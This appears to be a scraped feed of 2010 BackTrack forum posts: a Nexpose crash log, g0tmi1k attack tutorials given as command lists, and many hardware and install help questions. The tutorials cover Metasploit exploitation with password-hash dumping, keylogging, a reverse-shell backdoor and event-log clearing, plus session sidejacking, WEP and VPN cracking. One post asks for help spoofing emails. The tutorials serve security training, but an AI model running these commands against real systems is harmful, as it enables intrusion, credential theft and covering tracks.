postgresql 3/19/10 7:28 AM: Nexpose PostgreSQL service status: 0
postgresql 3/19/10 7:28 AM: Nexpose PostgreSQL service status: 1
postgresql 3/19/10 7:28 AM: Determining whether database nexpose exists
NSC 3/19/10 7:28 AM: PostgreSQL 8.2.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.3 20040412 (Red Hat Linux 3.3.3-7)
DBUpgrader 3/19/10 7:28 AM: DB_VERSION = 38
DBUpgrader 3/19/10 7:28 AM: DB_REINDEX = 35
DBUpgrader 3/19/10 7:28 AM: Verifying database version...
DBUpgrader 3/19/10 7:28 AM: Installed DB VERSION = 38
DBUpgrader 3/19/10 7:28 AM: Database version 38 is up to date.
DBUpgrader 3/19/10 7:28 AM: Database does not require upgrading
NSC 3/19/10 7:28 AM: Initializing datastore login module...
NSC 3/19/10 7:28 AM: Synchronizing authentication sources...
UserManager 3/19/10 7:28 AM: Synchronizing XML users with datastore...
> NSC 3/19/10 7:29 AM: initializing extension manager from dir /opt/rapid7/nexpose/plugins
ExtMgr 3/19/10 7:29 AM: initializing...
ExtMgr 3/19/10 7:29 AM: Initialization successful.
Nexpose 3/19/10 7:29 AM: loading extension ExtensionHandler/java
vulndb 3/19/10 7:29 AM: Compiling vulnerability definitions. For first-time users, this could take several minutes.
vulndb 3/19/10 7:37 AM: Failed to load linuxrpm-rhsa-2006-0191: java.lang.OutOfMemoryError: Java heap space
vulndb 3/19/10 7:39 AM: Failed to load linuxrpm-rhsa-2009-1531: java.lang.O
vulndb 3/19/10 7:40 AM: Failed to load linuxrpm-rhsa-2006-0190: java.lang.O
#
# An unexpected error has been detected by Java Runtime Environment:
#
# Internal Error (53484152454432554E54494D450E435050020F), pid=5938, tid=308449
#
# Java VM: Java HotSpot(TM) Server VM (1.6.0_02-b05 mixed mode)
# An error report file with more information is saved as hs_err_pid5938.log
#
# If you would like to submit a bug report, please visit:
# java(dot)sun(dot)com/webapps/bugreport/crash(dot)jsp]HotSpot Virtual Machine Error Reporting Page
#
The Java virtual machine has aborted.
NeXpose security console exited with code 3
thks
-
4:28
»
remote-exploit & backtrack
Links
Watch on-line: http://g0tmi1k.blip.tv/file/3308154
Download :http://www.mediafire.com/?m12dyljmmje
Commands:
http://pastebin.com/9kygLiRe
What is this?
A basic guide to show how powerful the metasploit framework is!
>Setup & run a exploit.
>Use nmap to scan.
>Use db_autopwn (to exploit the masses!)
>Gather information about the target
>Read, download and upload files
>Run scripts
>Create & use a backdoor.
What do I need?
> Metasploit Framework
> (Vulnerable) target (e.g. Windows XP SP0/1)
Software
Name: Metasploit
Version: 3.3.3
Home Page:
http://www.metasploit.com/
Download Link:
http://www.metasploit.com/framework/download/
Commands:
Code:
cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]
use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
#set paypload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessoins -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y
##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
Notes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.
Song:
Vicky Devine - Facing The Truth
Video length: 9:07
Capture length: 29:20
Blog Post:
http://g0tmi1k.blogspot.com/2010/03/...etasploit.html
Forum Post:
~g0tmi1k
-
4:26
»
remote-exploit & backtrack
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?4mouo2krmzy
Commands:
http://pastebin.com/dEt7SAcS
What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!
What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*
Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page:
http://www.monkey.org/~dugsong/dsniff/
Download Link:
http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: sslstrip
Version: 0.6
Home Page:
http://www.thoughtcrime.org/software...rip/index.html
Download Link:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Name: Hamster Sidejacking Tool
Version: 2.0
Home Page:
http://hamster.erratasec.com/
Download Link:
http://hamster.erratasec.com/downloa...er-2.0.0.tar.z
Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Notes:
Song:
Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42
Blog Post:
http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post:
~g0tmi1k
-
4:22
»
remote-exploit & backtrack
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
Download video: http://www.mediafire.com/?vtynwngzwvy
Commands:
http://pastebin.com/TAAUw36Y
What is this?
Yet another video on "How to crack WEP".
How does this work?
ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).
Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)
From here, the attacker can use that key to decrypt the captured data from before, and now is able to read it as well as join the network.
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode & injection
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
http://www.aircrack-ng.org/doku.php
Download Link:
http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Commands:
Code:
airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
Notes:
If you want WPA/WPA2 PSK (with a hidden SSID) - See:
http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Song:
Mr. Oizo - Flat Beat
Video length: 03:50
Capture length: 07:23
Blog Post:
http://g0tmi1k.blogspot.com/2010/03/...th-client.html
Forum Post:
http://forums.remote-exploit.org/
~g0tmi1k
-
4:18
»
remote-exploit & backtrack
Links
Watch on-line: http://g0tmi1k.blip.tv/file/3356422
Download: http://www.mediafire.com/?qzncjwamjix
Commands:
http://pastebin.com/RuaqiV6L
Script (chap2asleap.py):
http://www.mediafire.com/?yng1zmkxuem
What is this?
This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.
What do I need?
> asleap
> wireshark
> chap2asleap.py & python
> THC-pptp-bruter
> VPN
Software
Name: asleap
Version: 2.2
Home Page:
http://www.willhackforsushi.com/Asleap.html
Download Link:
http://www.willhackforsushi.com/code...asleap-2.2.tgz
Name: THC-pptp-bruter
Version: 0.1.4
Home Page:
http://freeworld.thc.org
Download Link:
http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz
Name: chap2asleap.py
Version: 1.0
Home Page:
http://g0tmi1k.blogspot.com
Download Link:
http://www.mediafire.com/?yng1zmkxuem
Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.0.3 10.0.0.9
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3
wireshark -i eth1 -k
python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v
cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3
Notes:
More information about the script -
http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html
Song:
Two Fingers - Keman Rhythm
Video length: 03:03
Capture length: 5:48
Blog Post:
http://g0tmi1k.blogspot.com/2010/03/...-thc-pptp.html
Forum Post:
http://www.backtrack-linux.org
~g0tmi1k
-
-
5:51
»
remote-exploit & backtrack
Hello everyone my keyboard was working fine then all of a sudden it started acting up. Now when I boot into linux the keyboard works fine till I start the Xsever. At first I thought that the keyboard stopped working so I restarted it and still had the same problem. I ended up restarting it 8 times then I finally got pissed off and started to hit the keyboard now when I was done hitting it I kinda kept my hand on it and noticed it still types but I have to hold it for a long period of time for it to start typing. I have to hold the button for like 1-2 Sec for it to type one letter. Then i checked the keyboard setting and they where fine so any suggestions would be great.
Please Please get back to me on this I really don't want to reinstall it.
-
1:57
»
remote-exploit & backtrack
hi bt users
i am trying to give my username at login prompt as
bt login: root
i get a response incorrect login
how do i go around this
presently i am typing this thread via recovery mode which gave me a root shell and also took my password
why am i not allowed in normal login?
-
0:57
»
remote-exploit & backtrack
Hey guys, I was wondering if someone could tell me if Nessus is really required to run the tools in Backtrack. Aircrack tools specifically...thanks!
-
-
7:11
»
remote-exploit & backtrack
i have d-link dwl 2100 ap connected to biquied patch using low-loss coxial cable it works like charm can this be done to usb dongle so that i can put the antenna which comes with the dongle far to get better range or to extend it.if yes how long the coxial cable should be.the usb dongle gives 20 dbm connected 2 dbi omni antenna.?
if that can't be done.i have d-link dwl-2100 ap it acts as repeater also but thing is that you should put the root wep. i need to crack the root acess point wep.using my acess point as repeater then seat near my acess point with dongle connected to laptop.(the root acess point is mine) i have to do that.i wanna do this for eductianal perpose only. not for illegeal activites so i'm wondering is there a way to do that? if it works great .
is there a way since d-link have site serveuy ....site serveuy acts like airodump-ng in wifi . i'm trying to find a way to crack wep using the acesspoint since it have site servey (like airodump-ng in wifi)so can that be done?if yes how?if yes give me hints and i will do the rest,since d-link ap-2100 support injection and get good range.all devices are mine i wanna try them on myself to help you guyz latly i will do thread about some new ideas i tested and it work i will do them till i finish some stuff(school).
-
5:16
»
remote-exploit & backtrack
Hello all
every time i try to mount using
mount /dev/sda1 /mnt/sda
i get a /dev/sda1 cannot be found in /etc/fstab
however /dev/sda1 is listed by fdisk -l
any advice?
cheers
yoma
-
-
9:05
»
remote-exploit & backtrack
hey guys, last night i tried to to try chntpw in backtrack 4 pre final when i wanna do the following step i must first mount my drive so i did so but it say to me permission denied.i also tryed to go to start>start menue>then to storge media then i reload it then i can see my partions ,i tryed to enter were windows is installed and a box poped up and telled me an error and told me to try command to mount it.i type it it's code:mount -t ntfs-3g /dev/sda1.............(i don't remmber all the command) and then it's says permission denied....i also entered the command code : df
it shows the drive and mounted on what i saw my windows partion and mounted in /media/sda1
i tryed to do the chntpw -i ...........................the mounted drive and were is the SAM file located it also says permission denied
i locked users in both f8 safe mode (adminstrator) and my other user i wanna rest them using this tool to see how it work help plz
-
-
9:04
»
remote-exploit & backtrack
I'm trying to create a standard user account since sometimes I do some work that doesn't require root. However, for some reason it doesn't seem to create the home directory for the user. I've tried
useradd -d /home/username username
and it creates the user just fine, /etc/passwd shows that the home directory should be as listed, but when you visit /home no directories are listed.
Furthermore, when I log in with the user and run startx, the desktop shows all items in / , as if / is the current home directory.
Does anyone know what the problem is? I tried just doing a simple mkdir /home/username as well to make the directory, but then other errors come up saying some files are missing in the directory for the user. I imagine if useradd creates the home directory, it would create all necessary files as well. However, it's just not creating it.
Also, I did notice that in addition to the home directory not being correct, when logged into KDE the menu wasn't nice either. There was no backtrack menu item with all the tools organized well - instead they are all in a lost+found menu item, but there are so many they don't all fit on the screen. Is there an easy way to get the menu working the same for additional users as it does for root?
Any ideas?
-
-
9:13
»
remote-exploit & backtrack
Hello all
i am trying out the new BT4 release and cannot get it to connect or see any network connections on 2 pcs that i have tried.
one is a toshiba lappy with PRO/wireless 2200B
and the other is a desktop with a built in ethernet card.
when i do lshw in konsole i get:
*-network:1 DISABLED
description: wirless interface
product: PRO/rireless 2200BG (calexico) network connection
vendor: Intel corperation
physical id: a
bus info: pci@0000:02:0a.0
logical name:eth1
version: 05
serial: 00:0e:35:49:8c:ab
width:32 bits
clock: 33mhz
capabilities: pm bus_master cap_list ethernet physical wirless
configuration:broardcast=yes driver=ipw2200 driverversion=1.2.2k mprq firmware=ABG:9.0.2.6 (mar 22 2005) latency=64 link=no maxlatency=24 mingnt=3 module=ipw2200 multicast=yes wirless=radio off
ifconfig eth1 up makes no difference
any help would be greatly appreciated
cheers
-
-
9:56
»
remote-exploit & backtrack
Ciao a tutti, ho da poco acquistato un netbook "Asus EeePc 1000h", ho installato su una chiavetta da 4 gb backtrack4 Pre Final solo che, non riesco a connettermi con il wi fi, Mi date una mano? Grazie anticipatamente a tutti.
-
-
3:25
»
remote-exploit & backtrack
:mad:
Hi Guys ,
I have Windows Vista as my base operating system , then I loaded VMware and then downloaded the BT4 Final release.
My Lan card is a Intel(R) 82567LM Gigabit Network Connection. Then VMware has created 2 VMware Network Adapters.
I have tried the following to get the LAN working in BT4
1.I have tried setting the card to NAT , using the VMWARE program settings
2. Also tried using the custom settings choosing the vmware adapters.
3.tried using the ifconfig commands to assign an ipadress to the card manually.
Surely this shouldnt be that complicated ? What am I doing wrong here, can someone assist me please.
Thank you
-
-
17:11
»
remote-exploit & backtrack
hi, i have an Hp Pavilion Dv4-2012 laptop with ati hd 4200 video card, the problem is when i load the bt4 final live cd it loads everything fine until the gui mode startx, when i try to load the gui startx i receive a message Mode not supported, and returns to console mode. what can i do to solve this problem?
-
1:03
»
remote-exploit & backtrack
If you run the Wireless card ALFA AWUS036H with the rtl8187 chipset out of the box on Backtrack 4 Final Release, you can experience problems with the SSID not being correct interpreted. Sometimes the clients only sees the SSID as empty squares (in windows unprintable characters). The weired SSID is also filling up the AP-list on the client.
Applying this patch to airbase-ng will solve that problem:
hxxp://trac.aircrack-ng.org/ticket/714
If you from a client are able to associate with a SoftAP (Airbase-ng) but you don't get an IP address I would suggest you to try turning on the WEP flag/key.
But not getting an IP from dhcpd could also of course be a configuration problem. For solving that question there are I'm sure other threads.
-
-
19:43
»
remote-exploit & backtrack
How does backtrack 4 work on one of the new macbook pros running on VMware Fusion??
-
18:08
»
remote-exploit & backtrack
Hey all, i recently downloaded the bt4-final.iso from backtrack-linux.org and burnt the image to a dvd+r.
I can boot the live cd fine, the problem is when i go to install it through the ubiquity installer i can get through
the entire install setup (i set the partitioner to use the entire disk) then click reboot.
The system begins to power down and when i am prompted to remove the disk from the tray and
press enter the disk doesn't eject. I'm not sure if that's a problem or not so when the system starts
to power back up from the reboot i eject it manually let it continue its boot sequence.
The system then boots to the grub boot loader. (I don't see the need for this in my situation because
im using the entire hard disk, and when i installed pre-final it didn't install grub and worked fine.)
Anyways to cut to the chase when the system boots to grub and i choose a option like bt4 final frame buffer 1024x768
grub gives me a error code 15:cannot find file...or something like that.
Is there any way to just not install grub so that it just boots bt4?
thanks in advance. ;D
-
3:29
»
remote-exploit & backtrack
My AP (routeur) is just close to my ALFA network adapter (AWUS036H) !!!
I tried with Network manager and WIFI Radar =
I can associate with APs but cannot get an IP adress. SO the DHCP step fails ... in every case ...
But i can inject, the network is started ... the ALFA card is recognized by system (rtl8187 driver is loaded)...
Would it be a DRIVER issue ??????
When the access to AP is open (no WEP) it works ...
Than you for helping me, i made so much reserches ... without any answer ... or track ...
-
-
12:45
»
remote-exploit & backtrack
Hello everyone I can't seem to find a good place to help me with VOIP testing. The reason I'm interested in VOIP is because I have three computers on my home network that use Magicjack and Skype. Now all I'm asking if someone can point me the right direction.
Thanks for your time.....
-
8:47
»
remote-exploit & backtrack
Hello,
Before I'm losing my mind completely, I thought I should ask you about suggestions.
I'm trying to set up an soft AP with my Alfa AWUS036H
I'll start with a short description and we will see if someone already can pinpoint the problem from there. Otherwise I'm going to be more specific:
- I put my Alfa-interace in monitor mode with airmon-ng
- I start airbase-ng on the monitor interface
- I have configured my dhcpd.conf file and told the dhcp-deamon to work on the tap interface which is newly created with command airbase
- I set the IP on the tap interface (at0) to map to the correct IP which also is specified in dhcpd.conf as router and set the mtu to 1400 and bring up the at0-interface.
- I add the correct route to the specified net with the gateway set to the same IP as I specified on at0.
- I start the dhcpd and everything seems OK.
("Wrote 0 leases to leases file")
From my other laptop I'm able to see the newly created AP and I can connect to it but I don't get an IP from dhcpd.
If I run tcpdump on at0 the only thing I see is:
"12:24.069960 TheClient'sMAC (oui Unknown) Null > Broadcast Unknown DSAP 0x08 Supervisory, Receiver not Ready, rcv seq 0, Flags [Command], length 330"
What the h am I doing wrong? I am also able to see the client's request coming in:
"12:24 Client TheClient'sMAC associated (unencrypted) to ESSID: "secret"
I'm happy to give away all the conf-files and detailed descriptions, but I thought that I'll start with this light description and see if someone comes up with the solution or ideas.
Thanks / Alex
-
-
15:35
»
remote-exploit & backtrack
Hola
Siguiendo con la serie de videostutoriales sobre las herramientas de Backtrack, acá les traigo un video sobre la herramienta SEAT que esta en la categoria de information gathering :cool:
Online:
Youtube
Descarga:
2shared
Mirror:
Megaupload
Mirror:
Rapidshare
Saludos!
x7uk
-
2:41
»
remote-exploit & backtrack
hi my hardware:
D-link dwl 520+ with texas instrument ACX100 chipset! i bought this cause this one is the most available and i did checked the driver capable list on aircrack-ng.org website but the drivers out there and the patch did nothing :D i mean in backtrack 4 it is not working at all (at least i can't install it) the only distru detects it automaticly is ubuntu :D and i did cracked wep (my own AP which was d-link dsl-2640) with listining to packeges (read linux newbie tut at aircrack-ng website) i'm not sure it can inject the packages cause in packet injecting test i got almost nothing :D anyway if someone knows how to work with this just let me know !!:D
-
-
21:41
»
remote-exploit & backtrack
-
19:50
»
remote-exploit & backtrack
I picked up a mobile broadband card today from a company called Clear (those of you in Texas, especially San Antonio, should know who I'm talking about) and I was wondering if there's any way to make it work in BT4, or Linux in general? It's supposed to work fine on XP, Vista, and OSX but Linux isn't supported. I read around online about making cards work even when they're not supported. Any help?
-
19:45
»
remote-exploit & backtrack
The monitor keeps going black til i move the mouse every 10 minutes, i cant find anywhere where to turn that off, getting really annoying while trying to watch a movie? Anyone know where the settings for that is?
-
11:07
»
remote-exploit & backtrack
Salve ragà. Innanzitutto complimenti a tutti voi che collaborate attivamente a questo forum. In breve vi spiego il mio problema; ho scaricato la final di Backtrack 4, ma non riesco ad installarla in persistent mode su un hard disk esterno da 60 gb. Ho dato un'occhiata alla guida di remote exploit, ma seguendo le istruzioni alla lettera, non sono riuscito ad installarla. Qualcuno di voi, può gentilmente darmi una spiegazione esaustiva in modo da risovere il mio problema? grazie mille.
-
10:14
»
remote-exploit & backtrack
You become when I have a key and do not enter how certain with backtrack 4?
-
-
10:55
»
remote-exploit & backtrack
I am running backtrack 3 in vmware 7, which is installed in windows 7 home premium.
the connection configuration of vmnet's are as follows(see the image) :
h**p://img411.imageshack.us/i/vmnet.jpg/
vmnet9 : Custom --- 192.168.182.0
I am using dial up connection on windows 7, i am trying to open websites in backtrack but they are not opening.
any help would be appreciated
-
7:35
»
remote-exploit & backtrack
Bonjour à tous,
je souhaiterai installé backtrack 4 sur clé usb. Je sais que le 3 je peu l'installer sur une clé usb de 2 go mais backtrack 4 je ne sais pas :( ...
j'aimerai sur 4go, es-ce possible? sinon il faut 8 go ? je parle d'une installation complète comme si c'était un disque dur...
Merci d'avance !
-
-
22:19
»
remote-exploit & backtrack
My buddy is a computer science major and he set up 2 Wireless Networks Chiba1 and Chiba2, they have atleast 35% connectivity within a 10mile radius, when I airodump it shows him and his other comp using ALOT of bandwidth, but when you try to connect it always says limited connectivity!
Anyone else come across something like this before, got any suggestions, Its encryption is set to OPN, he said I wouldnt be able to figure out how he did it?
-
14:52
»
remote-exploit & backtrack
hi fellas i was playing with my own installed VM with BT4 final and i installed
htop as an easy process manager for the console
so after install and everything i run htop and after short orienting on the "gui"
i was seeing 60 same processes named console-kit-deamon
here a screenshot
Screenshot
after a short research on GOOGLE i found something like it is used for user identification and other stuff but nothing sounded usefull for me
so befor doing something stupid and other things i thought it is a good idea to post it here and see the response from more advanced people
and it seem that this problem is in ubuntu also but also no usefull info on it
i have installed the iso desktop image
and a second running the vmware image ^^ (here is the same bug)
just for fun and finding differences
also i wantet to have it all configurt my way
and naturaly i speak german so excuse me vor my bad grammar
-
13:05
»
remote-exploit & backtrack
anyone know or own a wireless card for laptop that work in backtrack including injection.
any suggestions will be appreciated , thank you
-
6:10
»
remote-exploit & backtrack
Hallo,
ich habe nach dem Tutorial "Backtrack 4 Bootable USB Thumb Drive with Full Disk Encryption" Backtrack auf meinem 8gb Stick installiert.
Alles hat einwandfrei funtioniert. Wenn ich jedoch den PC neustarte und über den USB-Stick booten will, erscheint nur auf dem Bildschirm:
"
Searching for Boot Record from USB RMD-FDD...OK
GRUB
"
und es tut sich nichts mehr...
Ich habe es schon mehrmals neu installiert, jedoch habe ich ständig wieder das selbe Problem beim Booten.
Hat jemand eine Idee, was der Fehler sein könnte?
mfg
Bober
-
3:24
»
remote-exploit & backtrack
Hi
I have a network card Wn422G v2.1.
I know that I need to installed Ath9k_htc drivers.
Someone could explain how to install the Ath9k_htc drivers
Thanks
-
-
12:45
»
remote-exploit & backtrack
Hi guys
Ive been having a look at the sendEmail prog and am trying to spoof a few emails.
I have seen this working in PureHates old video about the adobe exploit, where he used a spoofed mail from adobe.
I have tried sendEmail and get the following error.
ERROR => Connection attempt to localhost:25 failed
IO::Socket::INET: connect: Connection refused
I have looked around here and the web and some people say you have to start the SMTP server in Backtrack... So i try the following command.
sendmail start
and it just hangs not doing anything and i have to ctrl + c to get out of it..
any help or a punt in the right direction would be appreciated guys..
nice one
-
12:36
»
remote-exploit & backtrack
-
9:33
»
remote-exploit & backtrack
How can i do this?
Is there such a program that can do this?
Of course the sudo apt-get command wont work (sudo apt-get install rar unrar)
I tried to install winrar but i get this error
Code:
rar: /lib/libc.so.6: version `GLIBC_2.7' not found (required by rar)
Can anyone help?
Thanks.
-
6:06
»
remote-exploit & backtrack
does anyone know how to instal thw script airoway.sh in backtrack 4?
please help me.
-
-
15:48
»
remote-exploit & backtrack
hi,
i cant remember a tool i used on backtrack or where to find it. it was a wodlst creator.
for example i have a wpa handshake i know my wpa is 8 lettes long and in capital letters. there was a tool on backtrack where i could point this tool to the handshake file and it would start going though all the letter e.g
AAAAAAAB
AAAAAAAC
AAAAAAAD
and so on but i just cant remember where this tool is on backtrack
hope you can help
-
11:43
»
remote-exploit & backtrack
Hi
I have successfully install my hd5970 double GPU.
I can run pyrit only on the first of GPU, because if I use both GPU result in error
link to discussion hxxp://code.google.com/p/pyrit/issues/detail?id=123
Lukas (pyrit's developper) suggested me to change the source code of cpyrit.py line 375 from
Code:
for dev_idx in range(p.numDevices):
to
Code:
for dev_idx in range(p.numDevices)[:2]:
and now
Code:
root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r228) (C) 2008-2010 Lukas Lueg hxxp://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (36830.8 PMKs/s)... /
Computed 35963.01 PMKs/s total.
#1: 'OpenCL-Device 'Cypress'': 32751.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 520.0 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 493.9 PMKs/s (RTT 2.8)
#4: 'CPU-Core (SSE2)': 498.5 PMKs/s (RTT 2.8)
#5: 'CPU-Core (SSE2)': 519.9 PMKs/s (RTT 2.9)
#6: 'CPU-Core (SSE2)': 484.0 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 530.6 PMKs/s (RTT 3.1)
#8: 'CPU-Core (SSE2)': 476.9 PMKs/s (RTT 2.9)
My second GPU apparently is not working under pyrit. Now I'm trying to figure out whether it is a hardware failure or not and my question is if anyone can successfully run pyrit on ati hd5970 using both GPU
-
8:05
»
remote-exploit & backtrack
Hello all,i'm newbie
I want to set up lamp in backtrack but when i finished , i can't use mysql
when i use mysql command in konsole
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
can i help me ,plz ?
Thank for read Thread
-
7:29
»
remote-exploit & backtrack
Greetings everyone.
Just had, hopefully, a simple question regarding BT4 and BASE.
For our testing purposes, we installed BT4 and are testing some stuff out, including Snort and BASE.
We had no problems getting snort, mysql and BASE up and running. Everythign is working well, except when in the BASE interface and you click on "GRAPH ALERT DATA", we get the following error:
PHP ERROR: PHP build incomplete: the prerequisite GD support required to generate graphs was not built into PHP. Please recompile PHP with the necessary library (--with-gd)
Simple enough in that it looks like PHP needs to be recompiled with the appropriate options.
Now, my main question is, what is the best way to do this on Backtrack so I dont break anything?
Anyone have any recommendations on how to do so?
I appreciate it.
TCG
-
-
22:19
»
remote-exploit & backtrack
I have been out of the loop for about a year now. About 20min ago I installed BT4 on VM player 3.0.1 Everything seems to work fine. Sadly I have been damned to Windows 7 as a host OS at work. I would like to use the LAN eth0 for surfing on the host OS (Windows 7) while I am using BT4 final in the VM using my Alfa AWUS036H 500mW to connect to another AP. For some reason BT inherits the host IP. I take it this has something to do with NAT. Anybody know how this is fixed?
-
15:53
»
remote-exploit & backtrack
Hello.
Not sure if i should post this in the bugs, hardware or this forum.
Anyhoo... I got this oldish Sony vaio. Intel onboard wifi chipset, BT4 final loaded iwl3945, iwlcore and mac80211. It connects fine, injects fine, monitors fine, but when i setup a fake AP i got issues. Broadcasts the AP normally, other computers see the AP, but when connected to it they simply don't receive an IP from dhcpd3. At first i thought it was me doing something wrong, so i wrote down a small script and changed various values to see where was the problem (changing the dhcpd.conf, the AP parameters, etc etc). Then i tested the script with a Toshiba NB100 and it worked fine. AP up and running, clients connecting and getting assigned an IP. Googled around for iwl3945, found an other driver pack (compat-wireless with iwlwifi) which i compiled & installed, and then the wifi didn't work at all (error at loading micro code, ifconfig didnt work at all, etc). So i uninstalled and im stuck at this.
I realize my problem isnt a biggie. Most likely will get a usb dongle to use for testing honeypot and fake APs, but its annoying. Anyone had any simular issue, or any experience on this issue ? Thanks in advance!
-
12:29
»
remote-exploit & backtrack
None of the built in meterpreter scripts in my BT4 installation work. I get this error when I try to run any of them:
meterpreter > run killav
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run vnc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run metsvc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
Has anyone seen this before or have any ideas?
Thanks,
C
-
5:00
»
remote-exploit & backtrack
hello,
I'd like to get a good wireless USB adapter with Qos(802.11e), that works well with backtrack 4 and support monitor mode as well as injection.
I you can recommend a good one I woud really appreciate it.
-
0:58
»
remote-exploit & backtrack
i have a problem with sqlmap
and the problem is that its too slow . specially when i m going to dump the db
any suggestion ?
i have 5mbps connection and using backtrack in vmware last version
-
-
20:59
»
remote-exploit & backtrack
One simple Question. I have a dell inspiron b130 notebook it has a IPW 2200 wireless card. Can I hack a wep network with BT4 final?? Thats all I want to know
-
17:58
»
remote-exploit & backtrack
I finally get Backtrack installed, backtrack show up centered in the middle and doesn't use the whole screen. when I was running ubunto 9.10 didn't experience this problem. I've tried to install the nvidia-glx-71 drivers and got this error nvidia-glx-71: depends nvidia-71-kernel-source but it is not going to be installed. settingolution
changed the resilution settings but the picture got smaller, therefore it is set to what should be the correct setting.
Then I tried the fixvesa command, that didn't work. I also used the xconfig command which also didn't work.
any other ideas, suggestions on to fix this would be very helpful.
Thanks
-
9:36
»
remote-exploit & backtrack
my bt4 doesn't recognize my bluetooth driver so i think its not installed already i just want to know how to know my bluetooth driver version so i can download it from net and install it just want to know how to get my bluetooth version ?
-
8:46
»
remote-exploit & backtrack
i have d-link dwl 2100 ap connected to biquied patch using low-loss coxial cable it works like charm can this be done to usb dongle so that i can put the antenna which comes with the dongle far to get better range or to extend it.if yes how long the coxial cable should be.the usb dongle gives 17dbm connected 2 dbi omni antenna.?
